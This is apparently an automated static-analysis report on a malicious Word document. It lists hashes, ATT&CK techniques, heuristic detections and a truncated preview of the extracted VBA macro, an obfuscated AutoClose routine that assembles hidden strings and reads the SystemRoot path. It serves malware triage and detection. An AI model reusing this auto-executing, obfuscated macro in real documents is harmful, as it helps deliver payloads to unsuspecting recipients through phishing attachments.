Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7976c2d0e9462bd…

MALICIOUS

Office (OLE)

369.0 KB Created: 2018-12-03 07:17:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 374d87fe24ba0350012b57aba6ddaad5 SHA-1: e277cbd086713223cde6167393c434a442f3a16e SHA-256: b7976c2d0e9462bd66b8d640ed1f36afb06d5d0e243608fb26d3ce50f2402cc2
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoClose macro is triggered upon closing the document, and it utilizes CreateObject to execute code. This suggests the macro is designed to download and execute a secondary payload. The macro's obfuscated string concatenation, such as ogqntdkh & tfcdkjygn & imdooljl & irvbcyi & fmuuaixv & ylnbah, likely forms a URL or command for the payload delivery, but it is too obfuscated to reconstruct reliably. The presence of legacy WordBasic markers and the AutoClose execution further indicate malicious intent.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 47700 bytes
SHA-256: 15a75203026ecd529b784333ef63e4146a8483481c72c692ef421ac173cc74ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoClose()
mdhskerhh = -8 * 139
ogqntdkh = "4+$wpwtyxqcmubqpbi"
dcplq = 53761
bokr = (Not dcplq)
eyyugjx = -23 + 91
seuqxpn8 = -25 / 142
tfcdkjygn = "bybxsoeuoa+$"
zu = 8354
i = -55900
qrh = Not (zu > i)
bvse = -30656
u = (Not bvse)
xyaiygthjj = -48 / 20
p = 34868
owpv = 15356
jkoal = Not (p < owpv)
yyrkgnn = -72 - 54
imdooljl = "uvgqbxtjmoyqbv"
mvupgx = 16997
evp = -65220
eo = Not (mvupgx >= evp)
fmgyy05 = "te"
Dim seafcym As String
seafcym = -23 + 130
bsyf = -85
aii = -19866
s = Not (bsyf <= aii)
rkoarzkrou = -4 / 19
lazjvxq = "mp"
g = 22516
n = (Not g)
yu = -41795
chert = Val(Application.MailSystem) Like Val(1)
nz = (Not yu)
hedmzpys = -135 / 167
pxyenja = fmgyy05 & lazjvxq
Dim bmzljwqazcg As String
bmzljwqazcg = -50 / 93
anh = 4515
okq = (Not anh)
vviye = 37454
aeo = (Not vviye)
pqzp66 = 66441
kpos = 27357
ld = Not (pqzp66 > kpos)
irvbcyi = "wlpiu+$ebxie"
jfy = -63061
wpcqe = 19641
l = Not (jfy >= wpcqe)
m = -1377
ieecx = 53880
ey = Not (m <= ieecx)
fmuuaixv = "eaayvh"
y = 39609
byvzb = (Not y)
u = 50633
epli = -21790
a = Not (u > epli)
eui = -49094
qf = (Not eui)
ylnbah = "ezailwoim4+"
rd = -56900
t = -55378
wcz = Not (rd > t)
cicrx = -84 / 103
lvki5 = -3950
w = -23178
vpiyq = Not (lvki5 >= w)
i = -55432
y = 45857
y = Not (i <= y)
kcnliou = ogqntdkh & tfcdkjygn & imdooljl & irvbcyi & fmuuaixv & ylnbah
Dim ppqsvae0 As String
ppqsvae0 = -28 / 138
cwlk = 65393
h = (Not cwlk)
Dim eyigltdkwfv As Integer
eyigltdkwfv = -7 * 37
udu = -13618
iy = (Not udu)
xyieohm = "$qvcaeejzwseadz"
aecaao = -23 / 98
fdofrqx = "arybqw"
ehnspfhqnd = -71 * 179
fdvkdg32 = -29911
ujqyxn5 = -39316
jqu = Not (fdvkdg32 < ujqyxn5)
aau = -8988
yito = (Not aau)
kvyhon = -94 + 3
o = 19327
ohai2 = 5908
pfocs = Not (o >= ohai2)
qeubj = "vh"
zghuwloa = -160 / 106
foc = -59738
ufsbd2 = 13838
b = Not (foc >= ufsbd2)
micvuim1 = -127 + 86
iczjsidxjlug = -140 - 67
If chert Then
daovrzgvd33 = -110 - 74
oxojkcnou1 = Environ("Sys" & ietr & "temRoot")
dz = -46460
fnmw = 1145
End If
fj = Not (dz < fnmw)
otpoiyotzw6 = -63 - 118
yuixncwzf = -69 + 149
qxlwju = 48180
xuxa = 44420
xrhy = Not (qxlwju < xuxa)

Dim fywrsvoay As String
fywrsvoay = -165 + 29
zplsyvwtuwrvj1 = -38 + 12
Dim fysrfwejg2 As Integer
fysrfwejg2 = -21 / 167
veokty = "xcgy+$capauaxkwznzkrxa"
golkdi6 = -161 - 23
pougrdhxi = -37 * 84
bswbwpfaa57 = "oe+$yxpmuuska"
Dim avclpm As String
avclpm = -113 + 136
okeiexka68 = -159 / 69
Dim oixkeiubtu As Integer
oixkeiubtu = -18 * 138
diuiqhz = -108 - 135
qydesveu = -162 + 16
waegh = -51111
ay = 7008
aehxs = Not (waegh <= ay)
ieygnmqq = oxojkcnou1
u = -2596
rttw72 = 65345
jwi = Not (u < rttw72)
nheeuhpmixw = -131 - 8
yii = -55703
esb = (Not yii)
Dim xjmrho As Integer
xjmrho = -107 + 42
f = 57952
uohq = 36950
o = Not (f >= uohq)
hretj = -151 / 107
ieygnmqq = ieygnmqq + "\syst"
dduau5 = -49603
sso = -62988
o = Not (dduau5 < sso)
iybh99 = 39945
xlra65 = (Not iybh99)
aiyyr = "agqytsho"
udkbdthespa = -23 * 173
b = -23938
iya = (Not b)
bznyo = 22528
y = (Not bznyo)
uua = -16543
qjjjwrp24 = 52711
vqsttgp = Not (uua < qjjjwrp24)
Dim oaabuphvj As String
oaabuphvj = -92 - 169
qayiek = "xhukjnvkttzn+$uywt"
n = -54977
v = (Not n)
ljlajpnx = -130 / 56
uo = 37856
ap = (Not uo)
ydeootv = "oassoyvqduyjdqxrgb+"
zbkw = 27876
l = -25069
qf = Not (zbkw > l)
iya = 52179
qoa = (Not iya)
cah = 40862
fa = -15428
uao = Not (cah >= fa)
iuygqx0 = -49 + 55
oueoxvz = "$oeuerzfhyt"
j = 10705
xh = -39628
tjgd = Not (j < xh)
p = 42871
s = -32545
hpe = Not (p >= s)
Dim lgqoosnyoe As String
lgqoosnyoe = -98 + 155
uimjcoy = xyieohm & fdofrqx & qeubj & veokty & bswbwpfaa57 & aiyyr & qayiek & yd
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.